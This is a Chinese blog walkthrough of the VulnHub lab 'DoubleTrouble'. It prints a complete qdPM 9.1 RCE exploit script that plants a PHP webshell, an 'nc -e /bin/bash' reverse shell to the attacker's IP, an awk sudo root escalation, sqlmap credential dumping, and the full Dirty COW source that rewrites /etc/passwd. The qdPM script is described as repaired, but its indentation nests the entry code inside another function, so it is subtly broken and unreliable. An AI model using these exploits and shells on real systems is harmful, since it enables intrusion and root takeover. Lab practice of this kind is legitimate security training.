vulnhub靶场-DoubleTrouble

最新推荐文章于 2024-01-06 16:02:14 发布
最新推荐文章于 2024-01-06 16:02:14 发布
阅读量1.1k 收藏
点赞数
分类专栏: 网络安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42947816/article/details/125739402
版权

1、靶机信息

靶机名称:DoubleTrouble

靶机难度:中等

虚拟机环境:此靶机推荐使用Virtualbox搭建

目标:取得root权限+Flag

靶机地址:https://download.vulnhub.com/doubletrouble/doubletrouble.ova

kali服务器IP

192.168.189.4

靶机IP-1

192.168.189.5

靶机IP-2

192.168.189.6

2、靶机-1

2.1 主机发现

2.1.1 首先使用ARP协议进行主机发现,发现靶机IP-192.168.189.5

sudo arp-scan -l

2.1.2 对靶机IP地址使用Nmap进行端口发现,靶机开启22,80端口

nmap -p- 192.168.189.5

2.1.3 对开启的端口进行服务版本识别,22端口为OpenSSH 7.9p1,80端口为Apache 2.4.38,并且目标靶机为Debian系统

nmap -p 22,80 -sV 192.168.189.5

2.2 Web信息收集

2.2.1 访问目标靶机80端口,可以看到使用了开源项目CMS版本:qdPM 9.1

http://192.168.189.5/

2.2.2 使用dirsearch对目标站点进行Web目录爬取

dirsearch -u http://192.168.189.5 -e *

http://192.168.189.5/backups/

无内容

http://192.168.189.5/core/

无有用信息

http://192.168.189.5/css/

无有用信息

http://192.168.189.5/images/

无有用信息

http://192.168.189.5/install/

可创建数据库账密

http://192.168.189.5/js/

无有用信息

http://192.168.189.5/secret/

有一张图片

http://192.168.189.5/template/

无有用信息

http://192.168.189.5/uploads/

无有用信息

2.3 图片隐写技术

2.3.1 对secret目录下的图片进行下载,既然目录叫secret,怀疑图片使用了隐写

http://192.168.189.5/secret/doubletrouble.jpg

2.3.2 使用steghide进行信息读取,发现需要密码,更加验证了这张图片有问题

steghide info doubletrouble.jpg

2.3.3 使用stegseek进行密码爆破,找到密码为92camaro,并且文件存储为file

GitHub - RickdeJager/stegseek: Worlds fastest steghide cracker, chewing through millions of passwords per second

stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt -xf file

2.3.4 打开名为file的文件,发现一个疑似账密的文本

otisrush@localhost.com

otis666

2.3.5 使用上面的账密成功登录至系统

2.4 EXP代码利用

2.4.1 使用exp-db检索qdPM 9.1,发现有一个RCE漏洞,下载的代码没法直接使用,有几个换行存在问题,可以直接使用下面我改好的这个

站点地址:qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) - PHP webapps Exploit

# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246
# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution

#!/usr/bin/python3

import sys
import requests
from lxml import html
from argparse import ArgumentParser

session_requests = requests.session()

def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
    request_1 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, uservar),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[remove_photo]': (None, '1'),
    }
    return request_1


def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
                         '.htaccess')
    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
                                files=request_1)
    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
                         '../.htaccess')
    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
                                 files=request_2)
    request_3 = {
        'sf_method': (None, 'put'),
        'users[id]': (None, userid[-1]),
        'users[photo_preview]': (None, ''),
        'users[_csrf_token]': (None, csrftoken_[-1]),
        'users[name]': (None, username[-1]),
        'users[new_password]': (None, ''),
        'users[email]': (None, EMAIL),
        'extra_fields[9]': (None, ''),
        'users[photo]': ('backdoor.php',
                         '<?php if(isset($_REQUEST[\'cmd\'])){ echo"<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
                         , 'application/octet-stream'),
    }
    upload_req = session_requests.post(HOSTNAME +
                                       'index.php/myAccount/update', files=request_3)
    
    
    def main(HOSTNAME, EMAIL, PASSWORD):
        url = HOSTNAME + '/index.php/login'
        result = session_requests.get(url)
        #print(result.text)
        login_tree = html.fromstring(result.text)
        authenticity_token =list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
        payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
                   'login[_csrf_token]': authenticity_token}
        result = session_requests.post(HOSTNAME + '/index.php/login',
                                       data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
        # The designated admin account does not have a myAccount page
        account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
        account_tree = html.fromstring(account_page.content)
        userid = account_tree.xpath("//input[@name='users[id]']/@value")
        username = account_tree.xpath("//input[@name='users[name]']/@value")
        csrftoken_ =account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
        req(userid, username, csrftoken_, EMAIL, HOSTNAME)
        get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
        final_tree = html.fromstring(get_file.content)
        backdoor =final_tree.xpath("//input[@name='users[photo_preview]']/@value")
        print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' +
              backdoor[-1] + '?cmd=whoami')
        
        
        if __name__ == '__main__':
            print("You are not able to use the designated admin account because they do not have a myAccount page.\n")
            parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')
            parser.add_argument('-url', '--host', dest='hostname', help='Project URL')
            parser.add_argument('-u', '--email', dest='email', help='User email(Any privilege account)')
            parser.add_argument('-p', '--password', dest='password', help='User password')
            args = parser.parse_args()
            # Added detection if the arguments are passed and populated, if not display the arguments
            if  (len(sys.argv) > 1 and isinstance(args.hostname, str) and
                 isinstance(args.email, str) and isinstance(args.password, str)):
                main(args.hostname, args.email, args.password)
            else:
                parser.print_help()

2.4.2 使用exp,脚本提示我们后门已经上传到了http://192.168.189.5//uploads/users/?cmd=whoami

python 50175.py -url http://192.168.189.5/ -u otisrush@localhost.com -p otis666

2.4.3 访问后门目录,可以看到有一个后门php文件

http://192.168.189.5//uploads/users/?cmd=whoami

2.4.4 可以直接远程命令执行,接下来我们尝试反弹shell

http://192.168.189.5//uploads/users/966210-backdoor.php?cmd=id

2.4.5 使用nc直接反弹shell

kali:nc -nvlp 9999

靶机:http://192.168.189.5//uploads/users/966210-backdoor.php?cmd=nc -e /bin/bash 192.168.189.4 9999

2.5 awk提权

2.5.1 使用sudo命令,查看能够执行哪些sudo命令,发现awk能够以sudo的方式执行

sudo -l

2.5.2 在网站检索awk命令,看看有没有提权的方式,选择sudo的形式,找到提权payload

awk | GTFOBins

2.5.3 使用提权命令成功提权至root

sudo awk 'BEGIN {system("/bin/sh")}'

2.5.4 在root目录下,又找到一个ova虚拟化文件

2.5.5 将ova文件下载到本地,并导入至virtualBox中

靶机:python3 -m http.server 8088

kali:wget http://192.168.189.5:8088/doubletrouble.ova

3、靶机-2

3.1 主机发现

3.1.1 跟上面一样,同样使用arp协议进行主机发现

sudo arp-scan -l

3.1.2 使用nmap进行端口发现

nmap -p- 192.168.189.6

3.1.3 对开放端口进行版本服务发现

nmap -p 22,80 -sV 192.168.189.6

3.2 SQL注入

3.2.1 发现80端口是一个登录界面

http://192.168.189.6/

3.2.2 按照惯例,使用dirsearch,但并没有目录发现

dirsearch -u http://192.168.189.6 -e *

3.2.3 使用sqlmap爆破,sqlmap发现一个基于时间注入点,通过burp成功复现,漏洞点存在

sqlmap -u http://192.168.189.6 -forms

3.2.4 尝试爆破数据库,获得两个数据库信息,doubletroubleinformation_schema

sqlmap -u http://192.168.189.6 --batch -forms -dbs

3.2.5 对数据库进行表爆破,获得一个users表

sqlmap -u http://192.168.189.6 --batch -forms -D doubletrouble --tables

3.2.6 对users表的字段进行爆破,发现两个账密

sqlmap -u http://192.168.189.6 --batch -forms -D doubletrouble -T users --dump

username1:montreux password1:GfsZxc1

username1:clapton password1:ZubZub99

3.2.7 Web页面使用两个账密无法登录,使用ssh只有clapton/ZubZub99能够登录

3.3 脏牛提权

3.3.1 显示clapton用户能以sudo方式执行的所有命令,发现并没有sudo权限,然后再其用户目录下,找到一个flag

flag:6CEA7A737C7C651F6DA7669109B5FB52

3.3.2 查看内核,发现为3.2.0,此内核是存在一个脏牛提权漏洞

uname -a

 

3.3.3 下载exp文件

GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195

kali:python3 -m http.server 80

靶机:wget http://192.168.189.4/dirty.c

//
// This exploit uses the pokemon exploit of the dirtycow vulnerability
// as a base and automatically generates a new passwd line.
// The user will be prompted for the new password when the binary is run.
// The original /etc/passwd file is then backed up to /tmp/passwd.bak
// and overwrites the root account with the generated line.
// After running the exploit you should be able to login with the newly
// created user.
//
// To use this exploit modify the user values according to your needs.
//   The default is "firefart".
//
// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):
//   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c
//
// Compile with:
//   gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
//   "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
//   mv /tmp/passwd.bak /etc/passwd
//
// Exploit adopted by Christian "FireFart" Mehlmauer
// https://firefart.at
//

#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>

const char *filename = "/etc/passwd";
const char *backup_filename = "/tmp/passwd.bak";
const char *salt = "firefart";

int f;
void *map;
pid_t pid;
pthread_t pth;
struct stat st;

struct Userinfo {
    char *username;
    char *hash;
    int user_id;
    int group_id;
    char *info;
    char *home_dir;
    char *shell;
};

char *generate_password_hash(char *plaintext_pw) {
    return crypt(plaintext_pw, salt);
}

char *generate_passwd_line(struct Userinfo u) {
    const char *format = "%s:%s:%d:%d:%s:%s:%s\n";
    int size = snprintf(NULL, 0, format, u.username, u.hash,
                        u.user_id, u.group_id, u.info, u.home_dir, u.shell);
    char *ret = malloc(size + 1);
    sprintf(ret, format, u.username, u.hash, u.user_id,
            u.group_id, u.info, u.home_dir, u.shell);
    return ret;
}

void *madviseThread(void *arg) {
    int i, c = 0;
    for(i = 0; i < 200000000; i++) {
        c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n\n", c);
}

int copy_file(const char *from, const char *to) {
    // check if target file already exists
    if(access(to, F_OK) != -1) {
        printf("File %s already exists! Please delete it and run again\n",
               to);
        return -1;
    }
    
    char ch;
    FILE *source, *target;
    
    source = fopen(from, "r");
    if(source == NULL) {
        return -1;
    }
    target = fopen(to, "w");
    if(target == NULL) {
        fclose(source);
        return -1;
    }
    
    while((ch = fgetc(source)) != EOF) {
        fputc(ch, target);
    }
    
    printf("%s successfully backed up to %s\n",
           from, to);
    
    fclose(source);
    fclose(target);
    
    return 0;
}

int main(int argc, char *argv[])
{
    // backup file
    int ret = copy_file(filename, backup_filename);
    if (ret != 0) {
        exit(ret);
    }
    
    struct Userinfo user;
    // set values, change as needed
    user.username = "firefart";
    user.user_id = 0;
    user.group_id = 0;
    user.info = "pwned";
    user.home_dir = "/root";
    user.shell = "/bin/bash";
    
    char *plaintext_pw;
    
    if (argc >= 2) {
        plaintext_pw = argv[1];
        printf("Please enter the new password: %s\n", plaintext_pw);
    } else {
        plaintext_pw = getpass("Please enter the new password: ");
    }
    
    user.hash = generate_password_hash(plaintext_pw);
    char *complete_passwd_line = generate_passwd_line(user);
    printf("Complete line:\n%s\n", complete_passwd_line);
    
    f = open(filename, O_RDONLY);
    fstat(f, &st);
    map = mmap(NULL,
               st.st_size + sizeof(long),
               PROT_READ,
               MAP_PRIVATE,
               f,
               0);
    printf("mmap: %lx\n",(unsigned long)map);
    pid = fork();
    if(pid) {
        waitpid(pid, NULL, 0);
        int u, i, o, c = 0;
        int l=strlen(complete_passwd_line);
        for(i = 0; i < 10000/l; i++) {
            for(o = 0; o < l; o++) {
                for(u = 0; u < 10000; u++) {
                    c += ptrace(PTRACE_POKETEXT,
                                pid,
                                map + o,
                                *((long*)(complete_passwd_line + o)));
                }
            }
        }
        printf("ptrace %d\n",c);
    }
    else {
        pthread_create(&pth,
                       NULL,
                       madviseThread,
                       NULL);
        ptrace(PTRACE_TRACEME);
        kill(getpid(), SIGSTOP);
        pthread_join(pth,NULL);
    }
    
    printf("Done! Check %s to see if the new user was created.\n", filename);
    printf("You can log in with the username '%s' and the password '%s'.\n\n",
           user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
           backup_filename, filename);
    return 0;
}

3.3.4 编译后运行,创建一个root权限的用户firefart

gcc -pthread dirty.c -o dirty -lcrypt

./dirty root

username:firefart

password:root

3.3.5 切换至firefart用户,此用户在root组中

su firefart

3.3.6 读取root目录下flag

flag:1B8EEA89EA92CECB931E3CC25AA8DE21

KALC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub-pWnOS: 2.0 (考点; simpe php blog / sql 注入/linux提权)
冬萍子癸水
04-22 319
nmap 就80web 两种方法,一种是SQL注入,一种是利用博客漏洞 第一种 dirbuster看到有博客,这里继续信息搜集,扫blog下的内容。毕竟blog下肯定也有很多东西。。 发现这个博客叫simple php blog page info 看到是0.4.0 搜漏洞 打它 perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -...
vulnhub - hackme 考点:(sql注入&上传&linux信息搜集)
冬萍子癸水
04-23 667
https://www.vulnhub.com/entry/hackme-1,330/ nat网络, arp-scan -l 扫出来比平常多的ip就是靶机 nmap看到80当然是web信息搜集,22想到找ssh登录信息 80看到登录框就注入干他,但是没用,可以注册,先注册吧。。 其他没收集到多少亮眼信息, 进入后是搜索书的搜索框。这种搜索框数据交互当然要想到注入了。。 试了几次,什么也别输入,点回...
Vulnhub靶机:doubletrouble
最新发布
qq_48904485的博客
01-06 992
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:doubletrouble(10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 674
攻击机:192.168.100.128靶机:192.168.100.130。
str045漏洞提权linux,Linux运维知识之CVE-2016-5195 Dirtycow: Linux内核提权漏洞
weixin_39636610的博客
05-16 270
本文主要向大家介Linux运维知识之CVE-2016-5195 Dirtycow: Linux内核提权漏洞绍了,通过具体的内容向大家展现,希望对大家学习Linux运维知识有所帮助。CVE-2016-5195Dirtycow:Linux内核提权漏洞以下都是github上找的源码,然后在ubuntu-12.04.5-desktop-i386上实验成功首先运行下面的确定漏洞:/*##########...
DoubleTrouble 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
01-08 209
DoubleTrouble 靶场渗透记录 玩盗梦空间是吧~打破“梦境”的不是陀螺,是sqlmap
Vulnhub-Earth
m0_52016680的博客
09-10 822
Vulnhub类OSCP靶场
DoubleTrouble:Bootcamp Innopolis项目2015
05-20
双重麻烦Bootcamp Innopolis项目2015
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
VulnHub日记(九):Doubletrouble
Dawn_Xi的博客
09-17 1438
靶机介绍 虚拟机链接:doubletrouble: 1 ~ VulnHub 参考博客:DoubleTrouble - HackMyVM - Vulnhub - Writeup - Security 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.122 netdiscover -r 192.168.56.0/24 nmap -A 192.168.56.122 开放80和22端口,访问web页面,同时使用dirsearch枚举目录 # .
stegseek:世界上最快的Steghide饼干,每秒可读取数百万个密码
03-31
:high_voltage: Stegseek Stegseek是一种快如闪电的Steghide饼干,可用于从文件中提取隐藏数据。 它是作为原始steghide项目的一个分支而构建的,因此,它比其他饼干要快数千倍,并且可以在2秒钟内遍历整个rockyou.txt *。 Stegseek还可以用于在没有密码的情况下提取steghide元数据,该密码可以用于测试文件是否包含steghide数据。 * rockyou.txt是一个著名的密码列表,其中包含超过1400万个密码。 演示:随机的rockyou.txt密码(实时) 跳至“以获取一些原始数据。 :wrench: 安装 以下说明将引导您完成安装过程。 或者,您可以在Docker容器中运行Stegseek。 跳至以获取说明。 发行版 Linux 在Ubuntu和其他基于Debian的系统上,可以使用提供的.deb软件包进行安装: 下载最新的 使用sudo apt in
vulnhubdoubletrouble: 1
weixin_54431413的博客
06-05 892
开源项目信息收集 框架漏洞突破边界 利用sudo配置不当进行提权 tabby工具远程连接linux,sftp传输文件 sql之时间盲注拿到密码打点成功 脏牛漏洞提权成功,复原/etc/passwd 改掉root密码
kali-vulnhub:doubletrouble
curme_miller的博客
01-26 4112
1.安装好doubletrouble靶机,界面如下:(kali:192.168.0.104;靶机:192.168.0.110) 为Debian,没有发现较明显的信息 2.开始扫描端口 $ nmap -Pn 192.168.0.110 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org
vulnhub-doubletrouble
weixin_50683638的博客
12-08 416
靶机:http://www.vulnhub.com/entry/doubletrouble-1,743/ 网络模式:nat 攻击机kali(nat) 1,扫描靶机IP 2,扫描存活端口 3,目录扫描,查看有用的信息 sudo arp-scan -l扫描同网段的靶机ip nmap -P 1-65535 -A 192.168.6.13722,80端口 访问 dirb http://192.168.6.137扫描目录看到两个比较特殊的文件secret,uploads 访问,看到一张图片,查看图片下载下来
vulnhub:doubletrouble1靶机
qq_63283137的博客
10-03 167
根据之前爆破的uploads目录,查看已经上传成功(要多观察下文件到底上传成功没有),爆出两组的账户密码,尝试登录80端口http、22端口ssh。查看当前用户的sudo权限,发现可以sudo执行awk命令。是个管理员登录界面,使用burp弱口令爆破,无用。发现这个主题有个文件上传的命令执行漏洞,先留着。#-xf 将破解出的信息存放到指定的文件里。是个登录界面,随手ssh爆破试试。尝试访问上面的目录,发现有个图片。发现有个ova镜像文件,下载下来。在访问上传的文件之前执行监听。分析漏洞,发现可以上传文件。
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权)
qq_45722813的博客
12-10 3900
Vulnhub靶场渗透测试系列DC-8(sqlmap进行SQL注入和exim4命令提权) 靶机下载地址:https://www.vulnhub.com/entry/dc-8,367/ 将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机 使用nmap进行主机发现,获取靶机IP地址,命令nmap -Pn 192.168.172.1/24 再使用nmap扫描靶机操作系统,开放端口和对应服务等 靶机开放22端口对应ssh服务,80端口对应http服务,这也是一个drupal的网页
【甄选靶场Vulnhub百个项目渗透——项目七:DerpNStink-1(sql注入,流量分析)
人间体佐菲的博客
08-23 2079
【专为新人甄选】Vulnhub百个项目渗透——项目七:DerpNStink-1
vulnhunb之doubletrouble:1
qwweggfe的博客
09-18 1663
由于这个靶机比较简单,所以我就直接写渗透过程了: 首先进行ip扫描 于是打开网页进行查看 发现他是qdPM 9.1搭建,我在网上查找发他有远程文件上传的漏洞,但是我们又没有用户名密码,于是我进行目录扫描 NVD - CVE-2020-7246 gobuster dir -r -u http://192.168.181.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html..
Vulnhub靶场DOUBLETROUBLE: 1
DG_s1mple
03-14 489
环境准备 把下载好的文件导入到vmware里面 题目里没有给出ip地址,需要我们自己去探测 信息收集 kali使用命令arp-scan命令探测IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.16 我们使用namp扫描一下靶机 只开放了ssh跟http 渗透开始 我们首先访问靶机的网站 是一个登录界面,没有什么信息,我们使用dirsearch扫描一下靶机的目录 都访问一下,然后发现secret目录下有一张图片 我们把它下载下载用stegseek爆破查一下是
doubletrouble靶机
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行爆破和数据挖掘操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶场-DoubleTrouble](https://blog.csdn.net/qq_42947816/article/details/125739402)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [靶机渗透练习63-doubletrouble](https://blog.csdn.net/Perpetual_Blue/article/details/124289479)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值